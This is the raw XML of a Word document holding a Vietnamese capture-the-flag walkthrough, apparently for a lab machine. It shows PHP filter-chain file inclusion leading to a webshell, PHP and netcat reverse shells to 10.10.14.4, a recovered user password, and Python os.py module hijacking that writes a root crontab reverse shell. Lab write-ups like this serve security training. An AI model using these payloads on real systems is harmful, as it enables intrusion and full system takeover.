    <w:p w14:paraId="72070C9F" w14:textId="137C11B2" w:rsidR="00575A33" w:rsidRDefault="00575A33">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19BF9CBA" w14:textId="2EFFC4D3" w:rsidR="00575A33" w:rsidRDefault="00575A3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Trang web tự thêm đuôi .php vào tham số pagename, mình thêm null byte không được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1668E871" w14:textId="7DA47024" w:rsidR="00575A33" w:rsidRDefault="00575A33">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="286F10A3" w14:textId="3F7987E5" w:rsidR="00575A33" w:rsidRDefault="00575A33">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00575A33">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mình sẽ dùng PHP Filter để thực thi lệnh từ xa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345F2147" w14:textId="408C6667" w:rsidR="00575A33" w:rsidRDefault="00575A33">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65414D70" w14:textId="34AC42B2" w:rsidR="00575A33" w:rsidRDefault="002C5874">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C5874">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET /dashboard.php?0=id&amp;image_id=a.jpg&amp;pagename=php://filter/convert.base64-encode/resource=login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F87727E" w14:textId="1A401EB9" w:rsidR="002C5874" w:rsidRDefault="002C5874">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28E7559B" w14:textId="16E1972F" w:rsidR="002C5874" w:rsidRDefault="002C587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Đọc được source code trang login.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67719B6C" w14:textId="0C6464AA" w:rsidR="002C5874" w:rsidRDefault="002C5874">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02768CDA" w14:textId="767EBB9D" w:rsidR="002C5874" w:rsidRDefault="002C587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Không có thông tin gì quan trọng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F079AE" w14:textId="02790DF6" w:rsidR="002C5874" w:rsidRDefault="002C5874">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56068143" w14:textId="4C5C80E7" w:rsidR="002C5874" w:rsidRDefault="002C587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Tạo php filter chains để thực thi lệnh từ xa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7007CE35" w14:textId="3DF57A4D" w:rsidR="002C5874" w:rsidRPr="00B35B42" w:rsidRDefault="00B35B42">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B35B42">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>python3 php_filter_chain_generator.py --chain '&lt;?=system($_GET[0]); ?&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57242F82" w14:textId="223F8152" w:rsidR="006E3C28" w:rsidRDefault="006E3C28">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CA4FE97" w14:textId="0595A73C" w:rsidR="006E3C28" w:rsidRDefault="002C587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Payload rất dài nên mình không ghi. Để thực thi được, phải chỉnh resource php://temp thành login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593D6424" w14:textId="23378D86" w:rsidR="002C5874" w:rsidRDefault="002C5874">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="253D1C5B" w14:textId="14D953A0" w:rsidR="002C5874" w:rsidRDefault="002C587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GET </w:t>
      </w:r>
      <w:r w:rsidRPr="002C5874">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/dashboard.php?0=id&amp;image_id=a.jpg&amp;pagename=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{payload}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046FE0F1" w14:textId="7069EC33" w:rsidR="006E3C28" w:rsidRDefault="006E3C28">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A9760E2" w14:textId="789F9623" w:rsidR="002C5874" w:rsidRDefault="00B35B4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Thực thi lệnh thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07027A6B" w14:textId="271BEF41" w:rsidR="00AF0643" w:rsidRDefault="00AF064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3DEBCEB" wp14:editId="2B34E402">
            <wp:extent cx="4724400" cy="520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651DF" w14:textId="6611A605" w:rsidR="00AF0643" w:rsidRDefault="00AF0643">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E1B0361" w14:textId="5DA977D3" w:rsidR="00AF0643" w:rsidRDefault="007254F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Cho nó reverse shell bằng php:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4966CD44" w14:textId="07DD8DF6" w:rsidR="007254F9" w:rsidRDefault="007254F9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="599BCB31" w14:textId="214446DD" w:rsidR="007254F9" w:rsidRPr="00E574E3" w:rsidRDefault="00FC3620">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E574E3">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php -r '$sock=fsockopen("10.10.14.4",1234);exec("/bin/bash &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535F5C15" w14:textId="0C5C7CA1" w:rsidR="00FC3620" w:rsidRDefault="00FC3620">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5325EEA6" w14:textId="4B5E9D21" w:rsidR="00FC3620" w:rsidRDefault="00C042F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D531070" wp14:editId="0259D575">
            <wp:extent cx="5943600" cy="16878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DA9A" w14:textId="668889B9" w:rsidR="00C042F2" w:rsidRDefault="00C042F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F1872DF" w14:textId="44270F9F" w:rsidR="00B20559" w:rsidRPr="00B20559" w:rsidRDefault="00B20559">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B20559">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298F14B0" w14:textId="77777777" w:rsidR="00B20559" w:rsidRDefault="00B20559">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12265171" w14:textId="4E9C65B9" w:rsidR="00C042F2" w:rsidRDefault="004962D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FAF0F63" wp14:editId="4D08298C">
            <wp:extent cx="4419600" cy="1244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7380E" w14:textId="072E66BA" w:rsidR="000F2278" w:rsidRDefault="000F2278">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A27A7CB" w14:textId="76BECF7E" w:rsidR="000F2278" w:rsidRDefault="000F227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Người dùng đang ở web root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1343A8F6" w14:textId="25B5B252" w:rsidR="004962D7" w:rsidRDefault="004962D7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4686BC2B" w14:textId="112AF955" w:rsidR="004962D7" w:rsidRDefault="000F2278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6BE6BCEC" wp14:editId="7C52C747">
            <wp:extent cx="1485900" cy="660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DC5D" w14:textId="3431B540" w:rsidR="000F2278" w:rsidRDefault="000F2278">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="292F0F96" w14:textId="510B780E" w:rsidR="000F2278" w:rsidRDefault="00D8598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Kiểm tra web root có mật khẩu của người dùng không</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A69F9AD" w14:textId="4009944B" w:rsidR="000F2278" w:rsidRDefault="00921B72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0136292" wp14:editId="4BBA9C50">
            <wp:extent cx="5943600" cy="28321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C79A" w14:textId="49184E4A" w:rsidR="00921B72" w:rsidRDefault="00921B72">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44804393" w14:textId="2BB4D610" w:rsidR="00921B72" w:rsidRDefault="00921B7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friend :</w:t>
      </w:r>
      <w:r w:rsidRPr="00921B72">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00921B72">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Agpyu12!0.213$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5384E260" w14:textId="2BED706A" w:rsidR="001317D3" w:rsidRDefault="001317D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EFE6FCB" w14:textId="7AD75563" w:rsidR="001317D3" w:rsidRDefault="00556EAA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DC591BD" wp14:editId="00C403ED">
            <wp:extent cx="5943600" cy="28536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3C34F" w14:textId="0BD72D0D" w:rsidR="00556EAA" w:rsidRDefault="00556EAA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58E7F89A" w14:textId="77777777" w:rsidR="002D5076" w:rsidRDefault="002D5076">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46CBAAE1" w14:textId="56392494" w:rsidR="00556EAA" w:rsidRDefault="00B14BE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1C67283" wp14:editId="7D3C7D98">
            <wp:extent cx="5168900" cy="6858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D2C89" w14:textId="6AE27DC0" w:rsidR="002D5076" w:rsidRDefault="002D5076">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DFF23DE" w14:textId="01CC2585" w:rsidR="002D5076" w:rsidRDefault="002D507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Kiểm tra các tiến trình đang chạy </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC80502" w14:textId="0774DF38" w:rsidR="00E902BC" w:rsidRDefault="00E902BC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29A42862" w14:textId="6B2EE820" w:rsidR="00E902BC" w:rsidRPr="00501D4E" w:rsidRDefault="00E902BC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501D4E">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./pspy64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018C0931" w14:textId="74495020" w:rsidR="00E902BC" w:rsidRDefault="00E902BC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0730E831" w14:textId="07E0A223" w:rsidR="00B14BE3" w:rsidRDefault="00F55E8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Phát hiện được 1 tiến trình đáng nghi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E94563" w14:textId="4FB8C1B3" w:rsidR="00B14BE3" w:rsidRDefault="00F55E8C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A59051D" wp14:editId="136E41D7">
            <wp:extent cx="5943600" cy="3130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BD793" w14:textId="28579980" w:rsidR="00F55E8C" w:rsidRDefault="00F55E8C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43A8970C" w14:textId="41F9C9D6" w:rsidR="003363E1" w:rsidRDefault="003363E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Không ghi đè được reporter.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF6A440" w14:textId="437DD5AC" w:rsidR="00F55E8C" w:rsidRDefault="003363E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3F4A527" wp14:editId="6D9FD913">
            <wp:extent cx="5346700" cy="10541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B104F" w14:textId="052D84F7" w:rsidR="00031653" w:rsidRDefault="00031653">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="295D0C23" w14:textId="0C60CE08" w:rsidR="00031653" w:rsidRDefault="0003165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Chỉnh sửa được biến PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3248A4" w14:textId="77BA5285" w:rsidR="00031653" w:rsidRDefault="00C8105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3BE590B" wp14:editId="6BE35C82">
            <wp:extent cx="5943600" cy="5727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CA94F" w14:textId="14F8123F" w:rsidR="00CD0F47" w:rsidRDefault="00CD0F47">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BE0A680" w14:textId="7629014F" w:rsidR="00CD0F47" w:rsidRDefault="00CD0F4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Nhưng tệp thực thi reporter.py được khai báo đường dẫn rõ ràng nên ta không khai thác bằng PATH được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2417E1" w14:textId="69B4E708" w:rsidR="007705F3" w:rsidRDefault="007705F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F8B8DCE" w14:textId="70DB451B" w:rsidR="00CD0F47" w:rsidRDefault="007705F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File reporter.py gọi thư viện os để thực thi lệnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385C107E" w14:textId="77777777" w:rsidR="00CD0F47" w:rsidRDefault="00CD0F47">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="629A3F4E" w14:textId="01A0DB5E" w:rsidR="00C81053" w:rsidRDefault="007705F3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027AB0D" wp14:editId="599A9565">
            <wp:extent cx="5943600" cy="219265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C65AA" w14:textId="5DA4ED4B" w:rsidR="007705F3" w:rsidRDefault="007705F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F123237" w14:textId="78E5B6F3" w:rsidR="007705F3" w:rsidRDefault="007705F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007705F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ai cũng có thể chỉnh sửa thư viện os:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007705F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/usr/lib/python2.7/os.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66570F27" w14:textId="1FA89286" w:rsidR="00C81053" w:rsidRDefault="008026B8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0544C14" wp14:editId="15114FDA">
            <wp:extent cx="5943600" cy="368617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D71A" w14:textId="118DD1AC" w:rsidR="007705F3" w:rsidRDefault="007705F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08B16311" w14:textId="26F70BC7" w:rsidR="007705F3" w:rsidRDefault="007705F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Chỉnh sửa như thế nào để reverse shell thì không biết </w:t>
      </w:r>
      <w:r w:rsidRPr="007705F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F04A"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8BAB94" w14:textId="7F42483E" w:rsidR="007705F3" w:rsidRDefault="007705F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CDA7FEA" w14:textId="737644AB" w:rsidR="007705F3" w:rsidRDefault="007705F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Nếu chúng ta ghi vào os.py, chúng ta có thể chiếm quyền thực thi. Đây gọi là module hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B353FDF" w14:textId="64E00947" w:rsidR="007705F3" w:rsidRDefault="007705F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01D0DCA3" w14:textId="6DA6447D" w:rsidR="007705F3" w:rsidRDefault="007705F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Ghi đè crontab độc hại. Tạo 1 tệp os.py như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9E58A6" w14:textId="3BBBA375" w:rsidR="007705F3" w:rsidRDefault="007705F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="421091A9" w14:textId="7D0FA5C3" w:rsidR="005F56C8" w:rsidRPr="005F56C8" w:rsidRDefault="005F56C8" w:rsidP="005F56C8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F56C8">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>shell = '''* * * * *</w:t>
      </w:r>
      <w:r w:rsidR="00622D82">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F56C8">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc</w:t>
      </w:r>
      <w:r w:rsidR="00622D82">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F56C8">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10.10.14.4 1234 &gt;/tmp/f'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B0E720" w14:textId="77777777" w:rsidR="005F56C8" w:rsidRPr="005F56C8" w:rsidRDefault="005F56C8" w:rsidP="005F56C8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F56C8">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f = open('/etc/crontab', 'a')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9F6B39" w14:textId="77777777" w:rsidR="005F56C8" w:rsidRPr="005F56C8" w:rsidRDefault="005F56C8" w:rsidP="005F56C8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F56C8">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f.write(shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287AA076" w14:textId="3ADA41B9" w:rsidR="007705F3" w:rsidRPr="005F56C8" w:rsidRDefault="005F56C8" w:rsidP="005F56C8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F56C8">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62183105" w14:textId="551D6C59" w:rsidR="005F56C8" w:rsidRDefault="005F56C8" w:rsidP="005F56C8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D282DF" w14:textId="5D79EBCC" w:rsidR="005F56C8" w:rsidRDefault="003A064C" w:rsidP="005F56C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Kiểm tra file /etc/crontab thấy đã ghi job nhưng không nhận được shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2957CFBF" w14:textId="24DE7C5F" w:rsidR="00056F3A" w:rsidRDefault="00056F3A" w:rsidP="005F56C8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06561611" w14:textId="07CA747F" w:rsidR="00056F3A" w:rsidRDefault="00056F3A" w:rsidP="005F56C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Mình tìm cách khác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0559CAB4" w14:textId="77777777" w:rsidR="00EE42C9" w:rsidRDefault="00EE42C9" w:rsidP="005F56C8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="587FC5AB" w14:textId="5B4BC88E" w:rsidR="00056F3A" w:rsidRDefault="00056F3A" w:rsidP="005F56C8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE42C9">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echo "system('cat /root/root.txt &gt; /tmp/flag.txt')" &gt;&gt; /usr/lib/python2.7/os.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDBF15B" w14:textId="3FC72BFE" w:rsidR="003A064C" w:rsidRDefault="003A064C" w:rsidP="005F56C8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56EF7388" w14:textId="5973C96F" w:rsidR="003A064C" w:rsidRPr="00107D1D" w:rsidRDefault="00056F3A" w:rsidP="005F56C8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A038536" wp14:editId="7C214EF1">
            <wp:extent cx="3962400" cy="4826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064C" w:rsidRPr="00107D1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E668E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0409001D"/>
    <w:styleLink w:val="Style1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"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman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053D"/>
    <w:rsid w:val="00031653"/>
